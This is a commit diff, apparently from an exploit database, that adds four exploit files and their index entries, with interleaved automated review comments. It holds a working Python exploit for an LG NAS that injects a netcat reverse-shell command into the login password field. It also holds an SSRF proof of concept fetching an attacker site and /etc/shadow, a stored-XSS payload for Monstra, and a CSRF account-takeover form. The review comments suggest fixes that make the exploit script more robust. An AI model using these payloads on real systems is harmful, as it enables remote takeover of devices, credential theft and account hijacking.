DB: 2018-08-13
4 changes to exploits/shellcodes LG NAS 3718.510.a0 - Remote Command Execution Monstra 3.0.4 - Cross-Site Scripting Wavemaker Studio 6.6 - Server-Side Request Forgery Monstra-Dev 3.0.4 - Cross-Site Request Forgery(Account Hijacking)
This commit is contained in:
parent
9773c89242
commit
e5c23cdd53
5 changed files with 149 additions and 0 deletions
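--- a/exploits/hardware/webapps/45109.py
+++ b/exploits/hardware/webapps/45109.py
@@ -0,0 +1,52 @@
+# LG NAS 3718.510.a0 - Remote Command Execution
+# Author: @0x616163
+# Date: 2018-07-29
+# Credits: https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/
+# CVE: N/A
+# Firmware Version: 3718.510.a0
+
+#!/usr/bin/env python
+
+import sys
+import argparse
+import requests
+from collections import OrderedDict
+
+def checkUser(target):
+# Exploiting this vulnerability requires a valid user account
+# on the target NAS otherwise the vulnerable code is not executed
+parameters = OrderedDict([('op_mode', 'login'), ('id', 'admin'), ('password', 'pass'), ('mobile', 'false')])
+r = requests.post("http://" + target + ":8000/en/php/login_check.php", data=parameters)
+if r.text == "NG:WRONG PASSWORD\n":
+print "[*] Valid user found: admin"
+return 0
+elif r.text == "NG:NO USER\n":
+print "[*] User not found: admin"
+sys.exit(1)
+
+def sendPayload(target,lhost,lport):
+print "[*] Sending payload.."
+try:
+parameters = OrderedDict([('op_mode', 'login'), ('id', 'admin'), ('password', 'pass;/usr/bin/nc ' + lhost + " " + lport + " " + '-e /bin/bash'), ('mobile', 'false')])
+r = requests.post("http://" + target + "/en/php/login_check.php", data=parameters,timeout=0.001)
+except requests.exceptions.ReadTimeout:
+print "[*] Payload sent. Exiting."
+sys.exit(0)
+
+return 0
+def main():
+parser = argparse.ArgumentParser(add_help=True, description='LG NAS Unauthenticated Remote Code Execution')
+parser.add_argument('-t', action="store", dest='target', help='Target host or IP')
+parser.add_argument('-l', action="store", dest='lhost', help='Local host or IP')
+parser.add_argument('-p', action="store", dest='lport', help='Listening TCP port to connect back to')
+results = parser.parse_args()
+args = vars(results)
+if len(sys.argv) < 1:
+parser.print_help()
+sys.exit(1)
+else:
+if checkUser(args['target']) == 0:
+sendPayload(args['target'], args['lhost'],args['lport'])
+
+main()
+sys.exit(0)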
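Review bot: The shebang `#!/usr/bin/env python` sits on the file's eighth line, below the header comments, so it has no effect even though the file is committed as executable; it needs to be line 1. The `print "..."` statements are Python 2 syntax, so `#!/usr/bin/env python2` would name the interpreter the script actually needs. In `main`, `if len(sys.argv) < 1` can never be true (argv[0] is always present), so the help path is dead; passing `required=True` to the three `add_argument` calls would let argparse reject a missing option instead of failing later with a TypeError on `"http://" + None`. `checkUser` also returns None implicitly when the response matches neither literal, so `main` then exits silently without saying why.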
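--- a/exploits/java/webapps/45158.txt
+++ b/exploits/java/webapps/45158.txt
@@ -0,0 +1,35 @@
+# Exploit Title: Wavemaker Studio 6.6 - Server-Side Request Forgery (SSRF).
+# Exploit Author: Gionathan "John" Reale
+# Google Dork: N/A
+# Date: 2018-08-01
+# Vendor Homepage: http://www.wavemaker.com/
+# Software Link: https://github.com/cloudjee/wavemaker/blob/master/wavemaker/wavemaker-studio/
+# Affected Version: 6.6
+# Tested on: Parrot OS
+# CVE : N/A
+
+# Description
+# Wavemaker Studio 6.6 contains an exploitable unvaildated parameter allowing an
+# attacker to pass dangerous content to a victim via a phishing link. The vulnerability
+# can also be exploited to access sensitive data or to use the server hosting Wavemaker
+# as a form of HTTP proxy among other things.
+
+# Proof Of Concept
+http://xxxx.xxxxx:xxxx/wavemaker/studioService.download?method=getContent&inUrl=http://attackersite.com/
+http://xxxx.xxxxx:xxxx/wavemaker/studioService.download?method=getContent&inUrl=file///etc/shadow
+
+# Vulnerable Code
+# /wavemaker-studio/services/studioService/src/com/wavemaker/studio/StudioService.java
+
+# Line 419-430
+@ExposeToClient
+public String getContent(String inUrl) throws IOException {
+try {
+String str = getRemoteContent(inUrl);
+str = str.replace("<head>", "<head><base href='" + inUrl
++ "' /><base target='_blank' /><script>top.studio.startPageIFrameLoaded();</script>");
+return str;
+} catch (Exception e) {
+return "";
+}
+}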
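Review bot: The quoted `getContent` method passes `inUrl` to `getRemoteContent` with no validation of scheme or host, and its `catch (Exception e) { return ""; }` discards every failure, yet the advisory gives no remediation guidance; it should state that the fix is to parse `inUrl` and accept only `http`/`https` URLs to an allowlisted set of hosts before fetching, and to log or propagate the exception instead of returning an empty string. The advisory also does not say whether `studioService.download` requires an authenticated studio session, which decides whether the endpoint is reachable directly or only through the phishing link it describes. The class enclosing the quoted method is not shown in the snippet.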
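--- a/exploits/php/webapps/45156.txt
+++ b/exploits/php/webapps/45156.txt
@@ -0,0 +1,17 @@
+# Exploit Title: Monstra-Dev 3.0.4 - Cross-Site Scripting
+# Date: 2018-08-04
+# Exploit Author: Nainsi Gupta
+# Vendor Homepage: http://monstra.org/
+# Software Link: https://github.com/monstra-cms/monstra
+# Product Name: Monstra-dev
+# Version: 3.0.4
+# Tested on: Windows 10 (Firefox/Chrome)
+# CVE : N/A
+
+# POC
+1- Go to the site ( http://server.com/monstra-dev/ ) .
+2- Click on Registration page (Registration) .
+3- Register by giving you name ,mail and soo on...
+4- Now log In i the website.
+5- After loggin in click on edit profile and in the frist name and last name copy paste this payload- in firsname paste "><svg/onload=alert(/Case/)> and in Lastname paste "><svg/onload=alert(/Test/)>
+6- After saving the above changes, click on edit profile page and you will be able to see to Pop up stating "Test" and "Case".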
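Review bot: The advisory only shows the injected first and last name firing on the user's own edit-profile page, so the impact as written is self-XSS; a sentence stating whether the stored names are also rendered to other users or in the admin user list is needed to establish that this is a stored XSS affecting other accounts. The title in the file (`Monstra-Dev 3.0.4 - Cross-Site Scripting`) also differs from the files.csv entry (`Monstra 3.0.4 - Cross-Site Scripting`); the two should agree.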
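--- a/exploits/php/webapps/45164.txt
+++ b/exploits/php/webapps/45164.txt
@@ -0,0 +1,41 @@
+# Exploit Title: Monstra-Dev 3.0.4 - Cross-Site Request Forgery(Account Hijacking)
+# Date: 2018-08-04
+# Exploit Author: Nainsi Gupta
+# Vendor Homepage: http://monstra.org/
+# Product Name: Monstra-dev
+# Version: 3.0.4
+# Tested on: Windows 10 (Firefox/Chrome)
+# CVE : N/A
+
+# 1. Description
+# CSRF vulnerability in admin/user/edit in Monstra-dev 3.0.4 allows an attacker
+# to take over a user account by modifying user's data such as email and password
+
+# 2. Exploit and Proof of Concept
+# To exploit this vulnerability, victim need to be logged in at target site namely
+# victim.com and visit crafted site made by attacker namely attacker.com.
+# Then an authenticated POST request will be generated from victim browser and it will
+# be submit to victim.com to modify user's data to attacker desired value.
+
+#POC:CSRF
+
+<html>
+<!-- CSRF PoC -->
+<body>
+<script>history.pushState('', '', '/')</script>
+<form action="http://localhost/monstra-dev/users/2/edit" method="POST">
+<input type="hidden" name="csrf" value="7e172c2a395495f3e4c05912cb9f3f7f0ed8344e" />
+<input type="hidden" name="user_id" value="2" />
+<input type="hidden" name="login" value="guptanainisi95" />
+<input type="hidden" name="firstname" value="sd" />
+<input type="hidden" name="lastname" value="jkh" />
+<input type="hidden" name="email" value="guptanainsi97@gmail.com" />
+<input type="hidden" name="twitter" value="" />
+<input type="hidden" name="skype" value="" />
+<input type="hidden" name="about_me" value="ss" />
+<input type="hidden" name="new_password" value="qaz" />
+<input type="hidden" name="edit_profile" value="Save" />
+<input type="submit" value="Submit request" />
+</form>
+</body>
+</html>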
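Review bot: The PoC form submits a hidden `csrf` field with a fixed token value, which implies the edit endpoint does carry an anti-CSRF token; the advisory should state whether that token is not validated, is static across sessions, or was simply captured from the author's own session, because a request that needs a per-session token is not forgeable cross-site and the claim stands or falls on that detail. The description names `admin/user/edit` while the form posts to `/monstra-dev/users/2/edit`; the two paths should be reconciled so readers know which handler is affected.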
|
@ -39756,6 +39756,7 @@ id,file,description,date,author,type,platform,port
|
|||
45103,exploits/linux/webapps/45103.txt,"Responsive Filemanager 9.13.1 - Server-Side Request Forgery",2018-07-30,"GUIA BRAHIM FOUAD",webapps,linux,
|
||||
45105,exploits/linux/webapps/45105.py,"H2 Database 1.4.197 - Information Disclosure",2018-07-30,owodelta,webapps,linux,
|
||||
45108,exploits/linux/webapps/45108.txt,"Craft CMS SEOmatic plugin 3.1.4 - Server-Side Template Injection",2018-07-31,0xB455,webapps,linux,
|
||||
45109,exploits/hardware/webapps/45109.py,"LG NAS 3718.510.a0 - Remote Command Execution",2018-07-31,0x616163,webapps,hardware,
|
||||
45127,exploits/php/webapps/45127.html,"WityCMS 0.6.2 - Cross-Site Request Forgery (Password Change)",2018-08-02,"Porhai Eung",webapps,php,80
|
||||
45128,exploits/php/webapps/45128.txt,"TI Online Examination System v2 - Arbitrary File Download",2018-08-02,AkkuS,webapps,php,80
|
||||
45129,exploits/php/webapps/45129.txt,"PageResponse FB Inboxer Add-on 1.2 - 'search_field' SQL Injection",2018-08-02,AkkuS,webapps,php,80
|
||||
|
@ -39775,6 +39776,9 @@ id,file,description,date,author,type,platform,port
|
|||
45152,exploits/aspx/webapps/45152.txt,"Sitecore.Net 8.1 - Directory Traversal",2018-08-06,Chris,webapps,aspx,
|
||||
45153,exploits/java/webapps/45153.txt,"LAMS < 3.1 - Cross-Site Scripting",2018-08-06,"Nikola Kojic",webapps,java,8080
|
||||
45154,exploits/php/webapps/45154.html,"onArcade 2.4.2 - Cross-Site Request Forgery (Add Admin)",2018-08-06,r3m0t3nu11,webapps,php,443
|
||||
45156,exploits/php/webapps/45156.txt,"Monstra 3.0.4 - Cross-Site Scripting",2018-08-06,"Nainsi Gupta",webapps,php,80
|
||||
45158,exploits/java/webapps/45158.txt,"Wavemaker Studio 6.6 - Server-Side Request Forgery",2018-08-06,"Gionathan Reale",webapps,java,
|
||||
45164,exploits/php/webapps/45164.txt,"Monstra-Dev 3.0.4 - Cross-Site Request Forgery(Account Hijacking)",2018-08-07,"Nainsi Gupta",webapps,php,
|
||||
45172,exploits/hardware/webapps/45172.rb,"TP-Link C50 Wireless Router 3 - Cross-Site Request Forgery (Remote Reboot)",2018-08-09,Wadeek,webapps,hardware,80
|
||||
45173,exploits/hardware/webapps/45173.rb,"TP-Link C50 Wireless Router 3 - Cross-Site Request Forgery (Information Disclosure)",2018-08-09,Wadeek,webapps,hardware,80
|
||||
45177,exploits/php/webapps/45177.txt,"Zimbra 8.6.0_GA_1153 - Cross-Site Scripting",2018-08-10,"Dino Barlattani",webapps,php,
|
||||
|
|